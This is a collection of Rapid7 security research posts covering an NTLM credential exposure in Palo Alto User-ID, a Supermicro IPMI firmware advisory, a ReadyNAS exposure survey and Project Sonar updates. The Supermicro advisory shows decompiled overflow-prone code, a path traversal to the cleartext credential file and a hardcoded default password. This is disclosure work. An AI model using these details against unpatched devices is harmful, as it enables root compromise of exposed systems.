appliance, resulting in an outbound SMB connection from User-ID to the attacker's IP address.This in turn allows an attacker to obtain the username, domain name, and encrypted password hash (typically in NetNTLM format) of the account that User-ID is configured to use. Since this feature requires privileged rights, the encrypted password hash is a serious concern and can expose the organization to a remote compromise.In addition to simply capturing the authentication details from the User-ID probe, the attacker could use off-the-shelf tools to relay the authentication back to any external-facing customer asset that accepts NTLMSSP authentication from the external network. Common examples include SSL VPNs, Outlook Web Access, and Microsoft IIS web servers.The issue of Windows account exposure through automated services is well-known and applies to almost every systems management product and utility in the Windows ecosystem. The PAN User-ID misconfiguration can present a serious exposure depending on the privileges granted to the service account assigned to User-ID. The same issue applies to thousands of products that perform automated authentication within the Windows ecosystem and we have observed the same misconfiguration in similar products. A correctly configured User-ID will still attempt to authenticate to internal hosts when Client Probing or Host Probing are enabled.It is possible to configure service accounts and the network in a way that mitigates the impact of NTLM relay and password hash cracking attacks. For more information on hardening Windows service accounts, please see the Mitigating Service Account Credential Theft on Windows whitepaper.Palo Alto Networks has released an advisory to track this issue. PAN customers should review the Best Practices for Securing User-ID Deployments document and immediately restrict User-ID to trusted zones or at least the IP ranges of trusted networks. We also recommend that customers review the Windows Service Account Credentials white paper, with an emphasis on hardening NTLM and blocking egress traffic on TCP ports 135, 139, and 445. This document also goes into methods that can be used to detect the use of stolen accounts, something that Rapid7 UserInsight customers can take advantage of today.

Mitigating Service Account Credential Theft

I am excited to announce a new whitepaper, Mitigating Service Account Credential Theft on Windows. This paper was a collaboration between myself, Joe Bialek of Microsoft, and Ashwath Murthy of Palo Alto Networks. The executive summary is shown below,Over the last 15 years, the…

I am excited to announce a new whitepaper, Mitigating Service Account Credential Theft on Windows. This paper was a collaboration between myself, Joe Bialek of Microsoft, and Ashwath Murthy of Palo Alto Networks. The executive summary is shown below,Over the last 15 years, the Microsoft Windows ecosystem has expanded with the meteoric rise of the internet, business technology, and computing in general. The number of vendors that provide management, assessment, and monitoring tools has exploded, along with the need for these products to handle ever-growing networks and respond to evolving security threats. The networks themselves are now becoming less trusted, as targeted attacks, advanced malware, cloud services, and bring-your-own-device (BYOD) policies erode the historic trust model of internal versus external networks. The time has come to assume breach when considering all aspects of network security.Mindsets about the network perimeter may be changing, but most management, assessment, and monitoring products still rely on trust boundaries and unidirectional authentication to the assets they access. For example, an automated backup service running on a central server under the context of a privileged account may automatically authenticate to workstations in order to access their file systems. A compromised or otherwise untrusted workstation can take advantage of this to steal the credentials of the backup service during the authentication process. Similar problems affect everything from network monitoring systems to vulnerability assessment products.This has led to an "elephant in the room" mentality among security practitioners, where there is a tacit understanding that the automated tools they use to maintain the security of the network could end up enabling an attack instead. Security product vendors often call out these risks in their documentation, but the greater IT ecosystem is less likely to be aware of these problems.This document describes practical mitigation strategies that reduce the effectiveness of attacks against automated authentication processes in a Windows environment, with a focus on accounts used by privileged services. Specific attacks are documented, along with mitigation techniques that apply to all commonly-used versions of the Windows operating system.HD MooreChief Research OfficerRapid7, Inc.PS. The pass-the-hash guidance (v2) from Microsoft is a great read for anyone interested in learning more about Windows authentication and the NTLM protocol in particular. Many of the mitigations for service account protection are also applicable to defending against pass-the-hash attacks.-HD

Goodnight, BrowserScan

The BrowserScan concept emerged during the heyday of Java zero-day exploits in 2012. The risk posed by out-of-date browser addons, especially Java and Flash, was a critical issue for our customers and the greater security community. The process of scanning each desktop for outdated plugins…

The BrowserScan concept emerged during the heyday of Java zero-day exploits in 2012. The risk posed by out-of-date browser addons, especially Java and Flash, was a critical issue for our customers and the greater security community. The process of scanning each desktop for outdated plugins was something that many firms couldn't do easily. BrowserScan helped these firms gather macro-level exposure data about their desktop systems, providing a quick health-check of their patch management process.Our no-scan and no-agent approach did have some drawbacks. It was difficult to identify vulnerable users behind a NAT gateway without doing deep integration with internal web applications. Our ability to track browser-specific vulnerabilities was hampered by consistency issues between vendors. Additionally, some of our users didn't want a cloud-based solution and asked for a on-premise installation instead. These limitations were acceptable so long as the primary use case of identifying out-of-date addons was helping the community. Over the last two years, web browsers and their associated addons have evolved to reduce the risk of attack. Java no longer runs applets by defaults. Firefox no longer allows outdated plugins to load. Internet Explorer 10 now throws a nasty popup when a site tries to detect whether Java is installed. Chrome manages its plugins as part of the browser itself, which is constantly being updated. In short, most of the attack surface that BrowserScan was designed to detect is no longer accessible. Even worse, trying to detect out-of-date addons now causes some browsers to emit warnings about a possible attack.We feel that the browser addon ecosystem has changed enough that BrowserScan has outlived its usefulness. We will begin ramping down the service immediately, first by disabling new account creation and then gradually reducing the services. If you are an active user, you will receive an email soon describing the ramp-down process and the timeline for removing the widget from your web sites.If you have any questions, you can reach the BrowserScan team via research[at]rapid7.comUpdate: We have released PluginScan, an open source implementation of BrowserScan available under the MIT license.-HD

Supermicro IPMI Firmware Vulnerabilities

Introduction This post summarizes the results of a limited security analysis of the Supermicro IPMI firmware. This firmware is used in the baseboard management controller (BMC) of many Supermicro motherboards. The majority of our findings relate to firmware version SMT_X9_226. The information in…

Introduction This post summarizes the results of a limited security analysis of the Supermicro IPMI firmware. This firmware is used in the baseboard management controller (BMC) of many Supermicro motherboards. The majority of our findings relate to firmware version SMT_X9_226. The information in this post was provided to Supermicro on August 22nd, 2013 in accordance with the Rapid7 vulnerability disclosure policy. More information on this policy can be found online at http://www.rapid7.com/disclosure.jsp. Note that this assessment did not include the actual IPMI network services and was primarily focused on default keys, credentials, and the web management interface. Although we have a number of Metasploit modules in development to test these issues, they are not quite ready for production use yet, so stay tuned for next week's Metasploit update. At our last count, over 35,000 Supermicro IPMI interfaces were exposed to the public internet. Supermicro has published a new firmware version (SMT_X9_315) that appears to address many of the issues listed identified below, as well those reported by other researchers. We have updated each entry to indicate how the new firmware version impacts these issues. A cursory review of the new firmware shows significant improvements, but we still recommend disconnecting the IPMI interface from untrusted networks and limiting access through another form of authentication (VPN, etc). Static Encryption Keys (CVE-2013-3619) The firmware ships with harcoded private encryption keys for both the Lighttpd web server SSL interface and the Dropbear SSH daemon. An attacker with access to the publicly available Supermicro firmware can perform man-in-the-middle and offline decryption of communication to the firmware. The SSL keys can be updated by the user, but there is no option available to replace or regenerate SSH keys. We have not been able to determine if firmware version SMT_X9_315 resolves this issue. Hardcoded WSMan Credentials (CVE-2013-3620) The firmware contains two sets of credentials for the OpenWSMan interface. The first is the digest authentication file, which contains a single account with a static password. This password cannot be changed by the user and is effectively a backdoor. The second involves the basic authentication password file stored in the nv partition – it appears that due to a bug in the firmware, changing the password of the ADMIN account leaves the OpenWSMan password unchanged (still set to admin). We have not been able to determine if firmware version SMT_X9_315 resolves this issue. CGI: login.cgi (CVE-2013-3621) The login.cgi CGI application is vulnerable to two buffer overflows. The first occurs when processing the name parameter, the value is copied with strcpy() into a 128 byte buffer without any length checks. The second issue relates to the pwd parameter, the value is copied with strcpy() into a 24 byte buffer without any length checks. Exploitation of these vulnerabilities would result in remote code execution as the root user account. The vulnerable code is shown below (auto-generated from IDA Pro HexRays). if ( cgiGetVariable("name") ) { v2 = (const char *)cgiGetVariable("name"); strcpy(&dest, v2); } if ( cgiGetVariable("pwd") ) { v3 = (const char *)cgiGetVariable("pwd"); strcpy(&v13, v3); } Firmware version SMT_X9_315 removes the use of strcpy() and limits the length of the name and pwd values to 64 and 20 respectively. CGI: close_window.cgi (CVE-2013-3623) The close_window.cgi CGI application is vulnerable to two buffer overflows. The first issue occurs when processing the sess_sid parameter, this value is copied with strcpy() to a 20-byte stack buffer without any length checks. The second issue occurs when processing the ACT parameter, this value is copied with strcpy() to a 20-byte stack buffer without any length checks. Exploitation of these vulnerabilities would result in remote code execution as the root user account. The vulnerable code is shown below (auto-generated from IDA Pro HexRays). if ( cgiGetVariable("sess_sid") ) { v1 = (const char *)cgiGetVariable("sess_sid"); strcpy(&v19, v1); } ... if ( cgiGetVariable("ACT") ) { v3 = (const char *)cgiGetVariable("ACT"); strcat(&nptr, v3); ... Firmware version SMT_X9_315 completely removes this CGI from the web interface. CGI: logout.cgi (CVE-2013-3622) [ authenticated ] The logout.cgi CGI application is vulnerable to two buffer overflows. The first occurs when processing the SID parameter, the value is copied with strcpy() into a 20 byte buffer without any length checks. The second issue relates to further use of the SID parameter, the value is appended with strcat() into a 32 byte buffer without any length checks. Exploitation of these vulnerabilities would result in remote code execution as the root user account.The vulnerable code is shown below (auto-generated from IDA Pro HexRays). if ( cgiGetVariable("SID") ) { v4 = (const char *)cgiGetVariable("SID"); strcpy(&s, v4); } Firmware version SMT_X9_315 switches to a GetSessionCookie() function that limits the length of the SID variable returned to this code and no longer calls strcpy(). CGI: url_redirect.cgi (NO CVE) [ authenticated ] The url_redirect.cgi CGI application appears to be vulnerable to a directory traversal attack due to lack of sanitization of the url_name parameter. This may allow an attacker with a valid non-privileged account to access the contents of any file on the system. This includes the /nv/PSBlock file, which contains the clear-text credentials for all configured accounts, including the administrative user. The vulnerable code is shown below (auto-generated from IDA Pro HexRays). sprintf(&v23, "%s/%s", *(_DWORD *)&ext_name_table[12 * i + 8], s); v18 = fopen(&v23, "r"); Firmware version SMT_X9_315 appears to fix this issue. CGI: miscellaneous (NO CVE) [ authenticated ] Numerous unbounded strcpy(), memcpy(), and sprint() calls are performed by the other 65 CGI applications available through the web interface. Most of these applications verify that the user has a valid session first, limiting exposure to authenticated users, but the review was not comprehensive. All instances of unsafe string and system command handling should be reviewed and corrected as necessary. Exploitation of these issues allows a low-privileged user to gain root access to the device. Firmware version SMT_X9_315 has reorganized the web root, adding quite a few new CGI applications, removing many more, and generally purging the use of insecure functions like strcpy(). In addition, the config_tftpd.cgi and snmp_config.cgi CGI applications now validate that the user has a valid session first. They did not before, but it wasn't clear what risk this posed. In fact, the only two CGI applications that are now exposed to unauthenticated users are vmstatus.cgi and login.cgi. Disclosure Timeline 2013-08-22 (Thu) : Initial discovery and disclosure to vendor 2013-09-07 (Fri) : Vendor response 2013-09-09 (Mon) : Disclosure to CERT/CC 2013-10-23 (Wed) : Planned public disclosure (delayed) 2013-11-06 (Wed) : Public disclosure 2013-11-06 (Wed) : Scanner modules written 2013-11-06 (Thu) : Vendor indicates a fix is available

Project Sonar: One Month Later

It has been a full month since we launched Project Sonar and I wanted to provide quick update about where things are, the feedback we have received, and where we are going from here.We have received a ton of questions from interested contributors about…

It has been a full month since we launched Project Sonar and I wanted to provide quick update about where things are, the feedback we have received, and where we are going from here.We have received a ton of questions from interested contributors about the legal risk of internet-wide scanning. These risks are real, but differ widely by region, country, and type of scan. We can't provide legal advice, but we have obtained help from the illustrious Marcia Hofmann, who has written a great blog post describing the issues involved. As always, every situation is different, and we do recommend getting legal counsel before embarking on your own scans. If you have don't have the appetite (or budget) to hire a lawyer, you can still get involved on the research side by downloading and analyzing publicly available datasets from Scans.IO.Currently, we are running regular scans for SSL certificates, IPv4 reverse DNS lookups, and most recently, HTTP GET requests. Our current challenge is automating the pipeline between the job scheduler and the final upload to the Scans.IO portal. We should have the process worked out and the new datasets publicly available in the next couple weeks. As the processing side improves, we will continue to add new protocols and types of probes to our recurring scans. If you have any ideas for what you would like to see covered, please leave a comment below, or get in touch via research-at-rapid7.com.-HD

Estimating ReadyNAS Exposure with Internet Scans

I wanted share a brief example of using a full scan of IPv4 to estimate the exposure level of a vulnerability. Last week, Craig Young, a security researcher at Tripwire, wrote a blog post about a vulnerability in the ReadyNAS network storage appliance. In an…

I wanted share a brief example of using a full scan of IPv4 to estimate the exposure level of a vulnerability. Last week, Craig Young, a security researcher at Tripwire, wrote a blog post about a vulnerability in the ReadyNAS network storage appliance. In an interview with Threatpost, Craig mentioned that although Netgear produced a patch in July, a quick search via SHODAN indicates that many users are still vulnerable, leaving them exposed to any attacker who can diff the patched and unpatched firmware. This seemed like a great opportunity to review our Project Sonar HTTP results and tease out recent exposure rates from a single-pass scan of the IPv4 internet. The first thing I did was a grab the patched and unpatched firmware, unzipped the archives, extracted them with binwalk, and ran a quick diff between the two. The vulnerability is obviously on line 17 and is the result of an attacker-supplied $section variable being interpreted as arbitrary Perl code. Given that the web server runs as root and Metasploit is quite capable of exploiting Perl code injection vulnerabilities, this seems like a low bar to exploit. Identifying ReadyNAS devices ended up being fairly easy. In response to a GET request on port 80, a device will respond with the following static HTML. <meta http-equiv="refresh" content="0; url=/shares/"> <!-- Copyright 2007, NETGEAR All rights reserved. --> Our scan data is in the form of base64-encoded responses stored as individual lines of JSON: {"host": "A.B.C.D", "data": "SFRUUC8xLjAgNDAwIEJhZCB...", "port": 80} I wrote a quick script to process this data via stdin, match ReadyNAS devices, and print out the IP address and Last-Modified date from the header of the response. I ran the raw scan output through this script and made some coffee. The result from our October 4th scan consisted of 3,488 lines of results. This is a little different than the numbers listed by SHODAN, but they can be explained by DHCP, multiple merged scans, and the fact that the ReadyNAS web interface is mostly commonly accessed over SSL on port 443. The results looked like the following: xxx.xxx.xxx.169 Thu, 07 Oct 2010 00:53:51 GMT xxx.xxx.xxx.42 Thu, 07 Oct 2010 00:53:51 GMT xxx.xxx.xxx.94 Tue, 02 Jul 2013 01:42:23 GMT xxx.xxx.xxx.113 Mon, 29 Aug 2011 23:04:43 GMT The interesting part about the Last-Modified header is that it seems to correlate with specific firmware versions. Version 4.2.24 was built on July 2nd, 2013 and we can assume that all versions prior to that are unpatched. $ cat readynas.txt | perl -pe 's/\d+\.\d+\.\d+\.\d+\t//' | sort | uniq -c | sort -rn 717 Tue, 02 Jul 2013 01:33:54 GMT 510 Tue, 02 Jul 2013 01:42:23 GMT 429 Fri, 24 Aug 2012 22:55:26 GMT 383 Wed, 05 Sep 2012 07:33:52 GMT 212 Mon, 13 Jul 2009 20:56:46 GMT 209 Mon, 29 Aug 2011 23:04:43 GMT 200 Fri, 02 Sep 2011 00:51:04 GMT 189 Sat, 06 Nov 2010 00:10:06 GMT 133 Thu, 02 May 2013 17:00:27 GMT 112 Thu, 31 May 2012 18:40:25 GMT ................................. If we exclude all results with a Last-Modified date equal to or newer than July 2nd, 2013, we end up with 2,257 of 3,488 devices vulnerable, or approximately 65% of ReadyNAS devices with their web interface exposed to the internet on port 80 are remotely exploitable. It isn't clear whether these stats would change significantly if the same scan was performed on port 443 or how the exposure rate has changed since this particular scan was run. This does give us a starting point to figure out how popular these devices are and what specific industries and regions are most affected, but I will leave that to a future blog post. If you are interested in seeing an exploit in action, Craig is hosting a demo on Tuesday, October 29th. -HD

The Security Space Age

I was fortunate enough to present as the keynote speaker for HouSecCon 4. The first part of my presentation focused on the parallels between information security today and the dawn of the space age in the late 1950s. The second section dove into internet-wide measurement…

I was fortunate enough to present as the keynote speaker for HouSecCon 4. The first part of my presentation focused on the parallels between information security today and the dawn of the space age in the late 1950s. The second section dove into internet-wide measurement and details about Project Sonar. Since it may be a while before the video of the presentation is online, I wanted to share the content for those who may be interested and could not attend the event. A summary of the first section is below and the full presentation is attached to the end of this post . In 1957 the soviet union launched Sputnik, the first artificial satellite. The US public, used to being first in most things scientific, panicked at being beaten to space. This lead to unprecedented levels of funding for science, math, and technology programs, the creation of NASA, and the first iteration of DARPA, known then as ARPA. Sputnik also set the precedent for the “freedom of space”.Although Sputnik was the first salvo in the space race, it was quickly left in the dust by increasingly powerful spy satellites The cold war accelerated technology by providing both funding and a focus for new development. Limited visibility meant that both sides were required to overestimate the capabilities of the other, driving both reconnaissance and weapon technology to new heights.The space age changed how we looked at the world. The internet was born from ARPA's attack-resistant computer network. Military technology was downleveled for civil use. GPS and public satellite imagery shrank the physical world.  Public visibility led to accountability for despots and companies around the world. Global imagery shone a light on some of the darkest corners of the planet.Technology developed in the paranoid shadows of the cold war radically changed how we live our lives today. The proverbial swords turned into plowshares faster than we could imagine.The differences between military and consumer capabilities are shrinking every year. Crypto export control is useless in the face of strong implementations in the public domain. Alternatives to GPS are launching soon and location awareness has gone well beyond satellite triangulation. High-resolution thermal imaging systems are available off-the-shelf from international suppliers.So what does all of this have to do with information security?  There are direct parallels between the start of the space age and the last decade of information security. Public fear over being out-gunned and out-innovated triggered a demand for improved security. Consumers and businesses are becoming aware of the real-world impact that a security failure can have. The more we move online, the more is at risk. Technology is been pushing forward at a phenomenal pace. Network neutrality draws similarities with the concept of “freedom in space”. Out of this environment, predators have emerged, first opportunistic criminals, and now organized crime, law enforcement, and intelligence agencies.The Snowden leaks have painted a detailed picture of how the US and its allies monitor and infiltrate computer networks around the globe. Although most of the security community assumed this kind of intelligence gathering went on, having it confirmed and brought into the limelight has been something else. Even the tin foil hat crowd didn't appear to be paranoid enough.Indeed, claims against China and Russia look weak in comparison to what we now know about US intelligence activities. To me, the most surprising thing is the lack of “cutting edge” techniques that have been exposed. Most of the methods and tools that have been leaked are not much different from what the security community is actively discussing at conferences like this.In fact, many of the tools and processes used by both intelligence and military groups are based on work by the security community. Snort, Nmap, Metasploit, and dozens of other open source security tools are mainstays of government-funded security operations, both defensive and offensive. Governments of every major power are pouring money into “cyber”, but the overlap between “secret” and “this talk I saw at defcon” is larger than ever. The biggest difference is where and how the techniques or tools are being used. Operationalized offense and defense processes are the dividing line between the defense industrial base and everyone else.It doesn't take a lot of skill or resources to break into most internet-facing systems. If the specific target is well-secured, the attacker can shift focus to another system nearby or even a system upstream. The number of vulnerable embedded devices on the internet is simply mind boggling. The Snowden leaks also confirmed that routers and switches are often preferred targets for intelligence operatives for this reason.  My research efforts over the last few years have uncovered tens of millions of easily compromised devices on the internet. The number doesn't get any smaller. More and more vulnerable equipment continues to pile up.IBM, Symantec, SANS, and SecureWorks all provide internet “Threat Levels”. Dozens of commercial firms offer “threat intelligence” services.  What actionable data are you getting from these firms? How do you know whether what they are providing is even accurate?Case in point. During 2012, an unknown researcher compromised 1.2 million nodes, using telnet and one of three passwords. 420,000 nodes were then used to conduct a scan of over 700 TCP and UDP ports across the entire internet. The same nodes were also used to send icmp probes and traceroutes to every addressable IPv4 address. Not a single “threat intelligence” vendor noticed the telnet exposure, its mass-compromise, or detected the scanning activity. In fact, nobody noticed the activity, and the internet became aware only after the researcher published a 9Tb data dump and extensive documentation and statistics from the project. The graphic you are seeing now is a 24 hour cycle of active public internet IPS (via ICMP), from this project.We can't improve things unless we can measure them. We cant defend our networks without knowing all of the weak links. We are starved for real information about internet threats. Not the activities of mindless bots and political activists, but the vulnerabilities that will be used against us in the future. Without this, we can't make good decisions, and we cant place pressure on negligent organizations. So, lets measure it. It is time for better visibility. It is time for accelerated improvement. It is time for a security space age.-HD

Welcome to Project Sonar!

Project Sonar is a community effort to improve security through the active analysis of public networks. This includes running scans across public internet-facing systems, organizing the results, and sharing the data with the information security community. The three components to this project are tools, datasets,…

Project Sonar is a community effort to improve security through the active analysis of public networks. This includes running scans across public internet-facing systems, organizing the results, and sharing the data with the information security community. The three components to this project are tools, datasets, and research.Please visit the Sonar Wiki for more information.

Featured Research

National Exposure Index 2017

The National Exposure Index is an exploration of data derived from Project Sonar, Rapid7's security research project that gains insights into global exposure to common vulnerabilities through internet-wide surveys.

Learn More

Upcoming Event

UNITED 2017

Rapid7's annual security summit is taking place September 12-14, 2017 in Boston, MA. Join industry peers for candid talks, focused trainings, and roundtable discussions that accelerate innovation, reduce risk, and advance your business.

Register Now

Podcast

Security Nation

Security Nation is a podcast dedicated to covering all things infosec – from what's making headlines to practical tips for organizations looking to improve their own security programs. Host Kyle Flaherty has been knee–deep in the security sector for nearly two decades. At Rapid7 he leads a solutions-focused team with the mission of helping security professionals do their jobs.

Listen Now